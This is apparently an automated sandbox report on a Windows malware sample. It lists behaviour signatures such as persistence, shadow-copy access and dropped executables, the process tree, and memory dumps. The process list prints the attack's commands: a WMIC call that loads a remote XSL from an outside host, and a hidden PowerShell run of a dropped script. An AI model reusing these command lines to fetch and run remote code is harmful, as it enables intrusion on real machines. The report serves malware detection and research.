Overview

overview

10

task1

 

10

task2

 

10

task3

 

10

task4

 

10

task5

 

8

task6

 

10

task7

 

10

task8

 

10

task9

 

10

task10

 

10

Analysis

  • max time kernel
    119s
  • max time network
    122s
  • resource
    win7v191014

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Supergevaarlijkk.zip

  • Sample

    191029-7v9yqqxm3n

  • SHA256

    6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score
N/A

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 9 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Executes dropped EXE 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs 18 IoCs
    persistence
  • Drops startup file 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 54 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Uses Volume Shadow Copy WMI provider 1 IoCs
    ransomware
  • Uses Volume Shadow Copy Service COM API 1 IoCs
    ransomware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Drops file in system dir 23 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Discovering connected drives
    • Suspicious use of FindShellTrayWindow
    PID:1272
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in system dir
    PID:1100
  • C:\Windows\system32\MsiExec.exe
    C:\Windows\system32\MsiExec.exe -Embedding 243205DFA88924D453B6AAC7C0F827FC
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1956
  • C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    PID:1232
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1499776792-45809992719698239551625986655-21409207021220800572-4155067481224807039"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2012
  • C:\Windows\syswow64\MsiExec.exe
    C:\Windows\syswow64\MsiExec.exe -Embedding A08CF5A0596379471CA5A4C2548E8A85
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    PID:2008
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
    1⤵
    • Suspicious use of WriteProcessMemory
    • Uses Task Scheduler COM API
    • Drops startup file
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Uses Volume Shadow Copy WMI provider
    • Uses Volume Shadow Copy Service COM API
    • Drops file in system dir
    PID:2068
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1126513327689161689607036660-26899110113909474221517395570954724345-1387271848"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2096
  • C:\Users\Admin\AppData\Local\Temp\lc8B1F.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc8B1F.tmp"
    1⤵
    • Executes dropped EXE
    PID:2196
  • C:\Users\Admin\AppData\Roaming\wEdauVc\nvsmartmaxapp.exe
    "C:\Users\Admin\AppData\Roaming\wEdauVc\nvsmartmaxapp.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2460
  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:2480
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {79C46DA5-25DB-4866-8858-337DEC9C8038} S-1-5-21-1774239815-1814403401-2200974991-1000:JUEOVPOM\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2812
  • C:\Users\Admin\AppData\Roaming\wEdauVc\gup.exe
    C:\Users\Admin\AppData\Roaming\wEdauVc\gup.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Loads dropped DLL
    • Executes dropped EXE
    PID:2844
  • C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    1⤵
    • Loads dropped DLL
    PID:2868

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1100-13-0x0000000000B10000-0x0000000000B14000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-14-0x0000000002040000-0x0000000002044000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-16-0x0000000000B10000-0x0000000000B14000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-12-0x0000000000B10000-0x0000000000B14000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-17-0x0000000002040000-0x0000000002044000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1100-11-0x0000000000F50000-0x0000000000F54000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1272-19-0x0000000002310000-0x0000000002314000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1272-0-0x0000000004180000-0x0000000004184000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1272-18-0x0000000004180000-0x0000000004184000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2068-21-0x000000001C3C0000-0x000000001C3C4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2068-22-0x000000001C3C0000-0x000000001C3C4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2480-30-0x0000000003680000-0x0000000003691000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2480-29-0x0000000003270000-0x0000000003281000-memory.dmp

    Filesize

    68KB

    Download

  • memory/2480-26-0x0000000000080000-0x0000000000081000-memory.dmp

    Filesize

    4KB

    Download